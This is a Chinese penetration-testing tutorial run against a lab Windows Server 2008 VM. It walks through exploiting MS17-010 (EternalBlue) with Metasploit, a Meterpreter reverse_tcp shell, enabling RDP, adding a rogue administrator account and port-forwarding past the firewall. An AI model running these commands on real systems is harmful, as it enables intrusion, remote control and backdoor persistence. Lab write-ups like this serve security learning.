Metasploit利用ms17_010渗透测试winserv 2008 SP 2

这次我们利用的是ms17-10对2008服务器进行一次渗透测试。

话不多说QAQ

测试环境:

攻击机:Kali (2018,2)  

 IP:192.168.10.78

靶机:windows server 2008 (SP1)  

IP:192.168.10.77

因为我的kali是2018年的,已经附带了ms17_010,有些小伙伴的kali还是2016的版本,我这里也贴出来了下载模块和安装教程。

这里借鉴百度的介绍wine:

Wine (“Wine Is Not an Emulator” 的递归缩写)是一个能够在多种 POSIX-compliant 操作系统(诸如 Linux,Mac OSX 及 BSD 等)上运行 Windows 应用的兼容层。

命令:apt-get install wine

默认回车或Y进行安装。

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

安装完成后,使用wine 测试一下是否能使用cmd.exe

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

exit退出

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

将脚本拷贝到 /usr/share/metasploit-framework/modules/exploit/windows/smb

cd Eternalblue-Doublepulsar-Metasploit

cp -r dips/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

ls查看一下是否存在,这里就不上图了因为我已经安装好了。嘿嘿orz

--假--装--分--届--线----------

以上就是安装ms17-010的操作了

然后使用nmap测试我们靶机开放了什么端口

nmap -O -sV 192.168.10.77

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

这时候我们的靶机是没有开启3389的

继续我们下面的操作

启动一下postgresql 

service postgresql start

然后进入msfconsole

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

然后search 快速搜索一下ms17-010

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

use exploit/windows/smb/ms17_010-eternalblue    调用模块

show options 查看需要设置的

Metasploit利用ms17_010渗透测试winserv 2008 SP 2


set RHOST 192.168.10.77   设置目标IP地址

set payload windows/x64/meterpreter/reverse_tcp。 选择payload

show  options。查看设置

set LHOST 192.168.10.78。 设置本机地址

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

设置payload以后查看一下设置,是不是漏下了什么,一般再设置payload都需要set 本机地址

然后exploit进行攻击,试一下。

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

问题不大,小场面稳得住,我们成功渗透进去了2008的测试靶机

然后我们可以开启3389啊,什么的骚操作等

Metasploit利用ms17_010渗透测试winserv 2008 SP 2


run getgui -e 是真的好用

虽然反馈信息系那时 RDP is disables 但是3389已经开启,来用nmap进行扫描看一下

Metasploit利用ms17_010渗透测试winserv 2008 SP 2


然后我们还是用 run getgui -u xxx -p xxxx 来创建用户和密码,为我们3389进入桌面做好铺垫

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

哦不!!! could not be created 这个是不能创建。orz

失败了, 这样我们就只能进shell ,然后创建用户,并进行提权了。

从meterpreter>进入shell

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

然后使用windos cmd命令进行创建用户并加入管理员组

net user admin 1q! /add。 因为2008系统原因密码必须要要有数字、字母、符合,我就说前面怎么测试失败,

net local group Administrators admin /add  把admin用户加入本地管理员组

试一下orz

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

然后我们就可以使用远程桌面进行连接

使用rdesktop + ip 

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

这里使用前面咱们设置好的用户名和密码,进行登录

Metasploit利用ms17_010渗透测试winserv 2008 SP 2

ok 这里我们成功进入了目标靶机,完成了这次的渗透测试,在前面我进行测试的时候因为目标靶机开启防火墙,导致我们3389连接不上,我们可以使用端口转发,把目标3389转到本地某个端口上

命令如下

meterpreter>portfwd add -l 你本机的监听端口 -r 127.0.0.1 -p 3389

然后我们就可以用windows下的远程桌面连接连接kali ip地址,进行桌面连接。

Metepreter与专业的远程控制软件不同。Metepreter更适合作为在获取最终权限之前当做临时的桥梁,而像灰鸽子这样的软件则更适合做为在获取权限之后的长期监控中使用。

这就是利用ms17-010进行的内网渗透、提权、开启远程桌面,达到我们想要的操作。

看到这里大家也对meterpreter有了一点了解。

谢谢大家的观看,希望大佬也能指出我的问题所在,让我们有进步的空间。

有喜欢渗透测试的小伙伴可以加我QQ:1627238774

互相学习,共同进步。